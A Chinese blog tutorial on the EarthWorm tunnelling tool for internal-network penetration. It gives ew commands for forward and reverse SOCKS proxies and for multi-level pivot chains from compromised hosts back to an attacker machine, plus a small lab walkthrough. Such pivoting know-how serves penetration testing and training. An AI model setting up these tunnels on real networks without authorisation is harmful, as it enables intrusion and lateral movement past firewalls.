内网渗透-Earthworm的简单使用(内网穿透工具)
Earthworm的简单介绍(一)
文章目录
- EarthWorm下载地址
- 1. 普通网络
- 1.1 跳板机存在公网IP
- 1.1.1 网络环境
- 1.1.2 使用方法
- 1.1.3 流量走向
- 1.2 跳板机不存在公网IP,可出网
- 1.2.1 网络环境
- 1.2.2 使用方法
- 1.2.3 流量走向
- 2. 二级网络
- 2.1 一级跳板机有公网IP
- 2.1.1 网络环境
- 2.1.2 使用方法
- 2.1.3 流量走向
- 2.2 一级跳板机无公网IP
- 2.2.1 网络环境
- 2.2.2 使用方法
- 2.2.3 流量走向
- 3. 三级网络
- 3.1 网络环境
- 3.2 使用方法
- 3.3 流量走向
EarthWorm下载地址
https://github.com/AA8j/SecTools/tree/main/ew
1. 普通网络
在普通网络环境下,可直接通过跳板机访问内网特定资源。
1.1 跳板机存在公网IP
1.1.1 网络环境
目标主机(公网IP:1.1.1.1,可访问特定内网资源)(跳板机)
1.1.2 使用方法
目标主机(公网IP:1.1.1.1,可访问特定内网资源):
ew -s ssocksd -l 8888
- 1
侦听本机的8888端口,提供socks代理
- 1
1.1.3 流量走向
本地主机--->1.1.1.1:8888--->特定内网资源
- 1
1.2 跳板机不存在公网IP,可出网
1.2.1 网络环境
攻击机(公网IP:1.1.1.1)
目标主机B(192.168.1.1,可出网,可访问特定内网资源)(跳板机)
1.2.2 使用方法
攻击机(公网IP:1.1.1.1):
ew -s rcsocks -l 1080 -e 8888
- 1
侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接
- 1
- 2
目标主机B(192.168.1.1,可出网)(跳板机):
ew -s rssocks -d 1.1.1.1 -e 8888
- 1
主动连接1.1.1.1的8888端口,打通隧道。
- 1
1.2.3 流量走向
本地主机--->1.1.1.1:1080---->1.1.1.1:8888--->192.168.1.1--->特定内网资源
- 1
2. 二级网络
在二级网络下,一级跳板机不能访问特定内网资源,二级跳板机可以访问内网特定资源。
2.1 一级跳板机有公网IP
2.1.1 网络环境
目标主机A(公网IP:1.1.1.1,内网IP:192.168.1.1,可访问主机B,不可访问特定内网资源)(一级跳板机)
目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机)
2.1.2 使用方法
目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机):
ew -s ssocksd -l 9999
- 1
侦听9999端口,提供socks代理
- 1
目标主机A(公网IP:1.1.1.1,内网IP:192.168.1.1,可访问主机B,不可访问特定内网资源)(一级跳板机):
ew -s lcx_tran -l 1080 -f 192.168.1.1 -g 9999
- 1
侦听本机1080端口,并转发到172.16.1.1:9999
- 1
2.1.3 流量走向
本地主机--->1.1.1.1:1080--->172.16.1.1:9999--->特定内网资源
- 1
2.2 一级跳板机无公网IP
2.2.1 网络环境
攻击机(公网IP:1.1.1.1)
目标主机A(内网IP:192.168.1.1,出网,可访问主机B,不可访问特定内网资源)(一级跳板机)
目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机)
2.2.2 使用方法
攻击机(公网IP:1.1.1.1):
ew -s lcx_listen -l 1080 -e 8888
- 1
侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接
- 1
- 2
目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机):
ew -s ssocksd -l 9999
- 1
侦听9999端口,提供socks代理
- 1
目标主机A(内网IP:192.168.1.1,出网,不可访问特定内网资源)(一级跳板机)
ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 172.16.1.1 -g 9999
- 1
将1.1.1.1:8888和172.16.1.1:9999双向建立连接,打通隧道。
- 1
2.2.3 流量走向
本地主机--->1.1.1.1:1080--->1.1.1.1:8888--->192.168.1.1--->172.16.1.1:9999--->特定内网资源
- 1
3. 三级网络
在二级网络下,一级跳板机不能访问特定内网资源,二级跳板机也不能访问,三级跳板机才可以访问内网特定资源。
同上可以总结出,一级跳板机肯定是要能出网的,只是有公网IP和没有公网IP两种情况。
这里假设其没有公网IP(有公网IP的情况参考二级网络,更简单)。
3.1 网络环境
攻击机(公网IP:1.1.1.1)
目标主机B(内网IP:192.168.1.1,出网,可访问主机C,不可访问特定内网资源)(一级跳板机)
目标主机C(内网IP:172.16.1.1,不出网,可访问主机D,不可访问特定内网资源)(二级跳板机)
目标主机D(内网IP:10.1.1.1,不出网,可访问特定内网资源)(三级跳板机)
3.2 使用方法
攻击机(公网IP:1.1.1.1):
ew -s lcx_listen -l 1080 -e 8888
- 1
侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接
- 1
- 2
目标主机C(内网IP:172.16.1.1,不出网,不可访问特定内网资源)(二级跳板机)
ew -s lcx_listen -l 9999 -e 7777
- 1
同样也是侦听9999端口,提供socks代理
并且将9999的代理发送到7777端口,此时也侦听7777端口,等待反弹连接
- 1
- 2
目标主机B(内网IP:192.168.1.1,出网,可访问主机C,不可访问特定内网资源)(一级跳板机)
ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 172.16.1.1 -g 9999
- 1
访问攻击机的8888端口和内网172.16.1.1的9999端口,将攻击机与C主机连通。
- 1
目标主机D(内网IP:10.1.1.1,不出网,可访问特定内网资源)(三级跳板机)
ew -s ssocksd -d 172.16.1.1 -e 7777
- 1
回连打通CD之间的隧道。
- 1
3.3 流量走向
本地主机--->1.1.1.1:1080--->1.1.1.1:8888--->192.168.1.1--->172.16.1.1:9999--->172.16.1.1:7777--->10.1.1.1--->内网特定资源
- 1
参考链接:http://rootkiter.com/EarthWorm/
Earthworm的简单介绍(二)
EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。
(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。
优点:
1.可穿透复杂的内网环境。(这么说吧:我本地连着路由器开一个虚拟机,可以直接反弹到公网的云服务器上。)
2.以支持多平台间的转接通讯,Linux、Windows、MacOS、Arm-Linux均支持。
支持平台列表:(可跨平台反弹)
- ew_for_Win.exe 适用各种Windows系统(X86指令集、X64指令集) Windows7、Windows XP
- ew_for_Linux32 各常见Linux发行版 (X86 指令集 CPU) Ubuntu(X86)/BT5(X86)
- ew_for_linux64 各常见Linux发行版 (X64 指令集 CPU) Ubuntu(X64)/Kali(X64)
- ew_for_MacOSX64 MacOS系统发行版 (X64 指令集) 苹果PC电脑,苹果server
- ew_for_Arm32 常见Arm-Linux系统 HTC New One(Arm-Android)/小米路由器(R1D)
- ew_mipsel 常见Mips-Linux系统 (Mipsel指令集 CPU) 萤石硬盘录像机、小米mini路由器(R1CM)
项目地址:
https://github.com/idlefire/ew
利用:
打开项目的文件,里面非常清楚的写了如何使用,我们直接在里面复制命令使用即可
一:在win7添加转接隧道,将 1080 收到的代理请求,转交给反连8888端口的主机
把ew_for_Win.exe文件放到win7中,然后该文件目录下执行./ew -s lcx_listen -l 1080 -e 8888
二:在kali主机上利用ssocksd方式启动9999端口的socks代理
把ew_for_linux64放到kali中,然后该文件目录下执行./ew -s ssocksd -l 9999
三:在 server2008主机上,通过工具的 lcx_slave 方式,打通win7 8888端口 和 kali 9999端口 之间的通讯隧道
同样把ew_for_win文件放进server2008主机上,在该文件目录下执行./ew -s lcx_slave -d 192.168.1.48 -e 8888 -f 192.168.1.49 -g 9999
四:kali主机输入python3 -m http.server 8988,然后kali本地区访问该端口
五:利用 proxifier工具,配置代理服务器,从而让主机访问自身的80端口,又因为配置了规则,此时将127.0.0.1转发给192.168.1.48的1080 再由192.168.1.48的1080端口转发给kali linux
六:设置转发规则
七:通过访问本地的8988端口,就可以访问kali linux任意端口
内网渗透-Earthworm的简单使用(内网穿透工具)相关推荐
- 内网渗透初探(一) | 小白学习内网渗透
0x01 基础知识 内网渗透,从字面上理解便是对目标服务器所在内网进行渗透并最终获取域控权限的一种渗透.内网渗透的前提需要获取一个Webshell,可以是低权限的Webshell,因为可以通过提权获取 ...
- 内网渗透(一)之基础知识-内网渗透介绍和概述
内网渗透介绍和概述 在我们讲解内网渗透的技术之前,我们先通过一张图来了解一下内网渗透的技术在整个渗透测试过程中处在一个什么样的位置 一.什么是内网 研究内网安全我们首先需要弄明白内网是什么?在渗透测试 ...
- 内网渗透初探(二) | 重新学习内网渗透全过程
一.前言 前面写了一篇内网渗透初探(一),写的不是特别好,然后也是在学习内网渗透相关的东西,就将其整理了一下,加了自己的思路,写好这篇内网渗透初探(二)- 二.环境介绍 专门做了个拓扑图,首先外网打点 ...
- 緊急流出!我會進入!手把手教你入门内网渗透(放課後Hなアルバイト)
前言 本文是关于内网安全系列的文章,我计划分为3部分来写,内网渗透三步走战略.在文章中我将尽可能把内容描述的通俗易懂一些,因为目前网上关于内网安全的文章不多也不少,但是对于新手来说都不怎么友好,我在一 ...
- 内网渗透代理转发详解及工具介绍
介绍一下个人网站 欢迎各位大佬光顾 http://www.sec0nd.top 文章目录 前言 正向代理和反向代理 正向代理 反向代理 举例辨别两者 内网渗透中代理的作用 工具介绍 msf nps f ...
- 1.我所了解的内网渗透
最近看了一点内网渗透的学习资料,感觉内网渗透需要的知识太多,遂写博客来记录下自己学习内网渗透的一些笔记. 开篇首先推荐i春秋陈小兵老师在技术沙龙上的分享:https://www.ichunqiu.co ...
- 内网渗透(五十二)之域控安全和跨域攻击-搭建和查看域信任关系
系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...
- 内网渗透(五十三)之域控安全和跨域攻击-利用域信任密钥获取目标域控
系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...
- 内网渗透(五十)之域控安全和跨域攻击-使用其他工具导出域账号和散列值
系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...
- 内网渗透(四十六)之横向移动篇-使用系统漏洞ms17010横向移动
系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...
最新文章
- 把view或者div绘制 canvas ,导出图片功能实现完整源码附效果图(兼容H5和小程序)
- Failure [DELETE_FAILED_INTERNAL_ERROR]的解决办法
- CentOS-7.0的核心安装与配置的补全
- TypeScript 的 generic 函数
- SAP CRM系统订单模型的设计与实现
- 疯子的算法总结10--最小生成树Kruscal
- 1001 A+B Format (20 分)
- 为Apple Push开发的PHP PEAR 包:Services_Apple_PushNotification
- 日常踩坑:pip安装包速度过慢,更换国内镜像源(亲测有效)
- Ubuntu enca命令可以用来查看文件的编码格式
- busybox inetd tftpd
- Win10电脑死机怎么办
- HTML语言的一些元素(二)
- 创建Win95 100M无盘工作站
- mysql 错误代码1130_mysql出现错误码1130怎么办
- 2.2.7 虚拟Ethernet以太网卡
- 转载 | 上汽集团云计算中心的开源之路
- 简述eureka的自我保护模式? 如何配置其自我保护模式
- 基于OpenCASCADE自制三维建模软件(五)鼠标模式
- Vba实现按选定类型排序标记